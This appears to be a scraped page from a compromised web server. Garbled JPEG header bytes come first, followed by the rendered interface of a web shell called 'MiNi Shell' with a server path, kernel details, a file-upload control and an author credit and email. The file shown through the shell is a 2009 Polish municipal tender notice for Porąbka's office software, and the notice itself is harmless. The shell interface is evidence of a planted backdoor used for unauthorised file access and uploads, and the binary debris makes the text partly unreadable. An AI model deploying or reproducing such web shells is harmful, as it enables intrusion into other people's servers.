JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091012/175995-N-2009.html

<p class="kh_header"><b>Porąbka: DOSTAWA, INSTALACJA  I WDROŻENIE SYSTEMU FRONT-OFFICE I BACK-OFFICE WRAZ  Z PRZEPROWADZENIEM SZKOLEŃ PRACOWNIKÓW URZĘDU GMINY W ZWIĄZKU Z REALIZACJĄ PRZEZ GMINĘ PORĄBKA PROJEKTU PN.: WDROŻENIE ZINTEGROWANEGO SYSTEMU KOMUNIKACJI PUBLICZNEJ  W GMINIE PORĄBKA</b><br>
<b>Numer ogłoszenia: 175995 - 2009; data zamieszczenia: 12.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Porąbka , ul. Krakowska 3, 43-353 Porąbka, woj. śląskie, tel. 033 8272802, 8272815, 8272810, faks 033 8272802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.porabka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA, INSTALACJA  I WDROŻENIE SYSTEMU FRONT-OFFICE I BACK-OFFICE WRAZ  Z PRZEPROWADZENIEM SZKOLEŃ PRACOWNIKÓW URZĘDU GMINY W ZWIĄZKU Z REALIZACJĄ PRZEZ GMINĘ PORĄBKA PROJEKTU PN.: WDROŻENIE ZINTEGROWANEGO SYSTEMU KOMUNIKACJI PUBLICZNEJ  W GMINIE PORĄBKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Realizacja przedmiotu zamówienia obejmuje następujące etapy:
I.Zintegrowany System Zarządzania Gminą ( moduły ESZG wraz z modułem e-Urząd)  front - office
a.Dostawa oprogramowań:
1.System FK - 4 licencje
2.System Budżet ( Budżet organu),Sprawozdawczość jednostki  - 2 licencje
3.Kasa jednostki - 1 licencja
4.Posesja  (wymiar i księgowość podatku od nieruchomości, rolnego osób fizycznych)  - 2 licencje
5.Kody kreskowe  - 1 licencja
6.Firmy Podatek (wymiar i księgowość podatku od osób prawnych)  - 1 licencja
7.Współpraca z FK - 1 licencja
8.Pojazd ( wymiar i księgowość środków transportowych) - 1 licencja
9.Kasa Podatkowa  - 1 licencja          
10.Rejestr Umów Dochodowych - 1 licencja
11.Rejestr Opłat  - 1 licencja            
12.Kasa Dochodów  - 1 licencja   
13.Ewidencja Działalności Gospodarczej  - 1 licencja     
14.Koncesje Alkoholowe  - 1 licencja      
15.Zarządzanie Dokumentami ESO  - 36 licencji - stanowisk
16.R_Pesel komunikacja z Ewidencją Ludności - 1 licencja
17.Moduł XML (współpraca z różnymi bazami danych) 1 licencja                     
18.Moduł e-urząd  - 1 sztuka-licencja     
b.Instalacja i wdrożenie oprogramowań:
1.ESZG ( Elektroniczny System Zarządzania Gminą)   - 250 godzin   
II.    Elektroniczny System Zarządzania Gminy - moduł wewnętrzny back - office:
a.     Dostawa, instalacja i wdrożenie oprogramowań:
1.     Dysponent budżetowy  - 3 licencje
2.     Ewidencja Wyposażenia  - 1 licencja
3.     Środki trwałe  - 1 licencja
4.     Oprogramowanie do współpracy GIS-em  Powiatu Bielskiego   - 1 licencja
III.   Szkolenie z zakresu Zintegrowanego Systemu Zarządzania Gminy - Cross-financing
a.     Szkolenia pracowników Urzędu Gminy  - 37 osób.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8, 48.44.00.00-4, 48.61.00.00-7, 72.26.30.00-6, 80.53.31.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Odstąpiono<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać wykonawcy spełniający następujące  warunki: 1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego  z nich). Warunek zostanie spełniony jeśli Wykonawca: a. prowadzi działalność w zakresie objętym przedmiotem zamówienia. Ocena zostanie dokonana na podstawie: złożonego aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej; złożonego oświadczenia, że Wykonawca spełnia warunki określone w  art. 22 ust. 1 ustawy Prawo zamówień publicznych.  2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. Warunek zostanie spełniony jeśli Wykonawca  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną dostawę wraz z usługami, odpowiadającymi swoim rodzajem  i wartościom   przedmiotowi zamówienia. Ocena zostanie dokonana na podstawie: a. wykazu wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw i  usług odpowiadających swoim rodzajem i wartością dostawom  i  usługom stanowiącym przedmiot niniejszego postępowania. Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie co najmniej jednej dostawy i usługi, zawierające informacje na temat ich wartości, przedmiotu, dat wykonania i odbiorców ( np. referencje). B. złożonego oświadczenia, że Wykonawca spełnia warunki określone  w art. 22 ust. 1 ustawy Prawo zamówień publicznych. C. pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli wykonawca złoży oświadczenie, że będzie dysponował pracownikami; 3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz przedstawi polisę ubezpieczeniową ( lub inny dokument)  potwierdzającą ubezpieczenie OC w zakresie prowadzonej działalności gospodarczej, w wysokości co najmniej takiej jak wartość składanej przez wykonawcę oferty.  Ocena zostanie dokonana na podstawie: dokumentu potwierdzającego posiadanie przez wykonawcę ubezpieczenia  OC w zakresie prowadzonej działalności, w wysokości co najmniej takiej jak wartość składanej oferty oraz złożonego oświadczenia, że Wykonawca spełnia warunki określone  w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 4. nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust 1 i 2 ustawy Prawo zamówień publicznych.  Warunek zostanie spełniony, jeśli Wykonawca nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków, gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Ocena zostanie dokonana na podstawie: aktualnego zaświadczenie właściwego naczelnika urzędu skarbowego  oraz aktualnego zaświadczenia właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że  wykonawca  nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne  lub  zdrowotne  oraz zaświadczeń,  że   uzyskał   przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.; złożonego oświadczenia, że Wykonawca spełnia warunki określone w  art. 22 ust. 1 ustawy Prawo zamówień publicznych. 5. udzielą  gwarancji  na  zrealizowane dostawy i usługi  min. 24 miesięcy.  Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży właściwe oświadczenie  w  zakresie  proponowanych  warunków  gwarancji. 6. Wykonają przedmiot zamówienia w terminach wymaganych przez zamawiającego.  Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży właściwe oświadczenie  w  zakresie  proponowanego terminu wykonania robót. 7. Zaakceptują załączony  do  specyfikacji projekt umowy. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży właściwe oświadczenie  w  zakresie  przyszłej umowy. 8. Przedstawią kosztorys ofertowy oraz szczegółowa specyfikację dostarczanego oprogramowania a także dokonają jego prezentacji w terminie określonym przez zamawiającego. 9. Zaakceptują stawiane przez zamawiającego warunki płatności. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży właściwe oświadczenie  w  zakresie  warunków płatności..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)wypełniony i podpisany  formularz  ofert,  
2)kosztorys ofertowy - załącznik nr 1 do oferty 
3)szczegółowa specyfikacja dostarczanego oprogramowania - załącznik nr 2  do oferty;   a także jego prezentacja, 
4)oświadczenie,  że  Wykonawca nie podlega wykluczeniu  z postępowania na podstawie art. 24 ust. 1 i 2  oraz, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 3 do oferty.
5)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześnie niż 6 miesięcy przed upływem terminu składnia ofert - załącznik nr 4 do oferty.
6)Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że  wykonawca  nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne  lub  zdrowotne  oraz zaświadczeń,  że   uzyskał   przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert -  załączniki nr 5 do oferty.
7)Wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, dostaw wraz z usługami,  które odpowiadają  swoim rodzajem i wartością przedmiotowi niniejszego postępowania. Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie co najmniej jednej dostawy i usługi (np. referencje ) - załącznik  nr 6 do oferty. 
8)Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli wykonawca złoży oświadczenie, że będzie dysponował pracownikami  - załącznik nr 7a do oferty.
9)wykaz  podwykonawców  przewidzianych  do  wykonania  zamówienia  (  o  ile  będą  zatrudnieni) - załącznik  nr 7b do oferty       
10)kserokopia polisy lub innego  dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę co najmniej taką jak wartość składanej oferty  - załącznik nr 8 do oferty.
11)dokumenty potwierdzające  uprawnienie osób podpisujących ofertę, o ile nie wynikają z przedstawionych dokumentów rejestrowych firmy - załącznik nr 9 do oferty,
12)w przypadku składania oferty przez wykonawców występujących wspólnie  - zgodnie z art. 23 Prawa zamówień publicznych wykonawcy muszą ustanowić pełnomocnika do reprezentowania ich  w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.  W takim przypadku do oferty należy załączyć stosowne pełnomocnictwo -  załącznik nr 10 do oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.porabka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY PORABKA  UL. KRAKOWSKA 3  POK.NR 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2009 godzina 09:00, miejsce: URZĄD GMINY PORABKA  UL. KRAKOWSKA 3  POK.NR 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com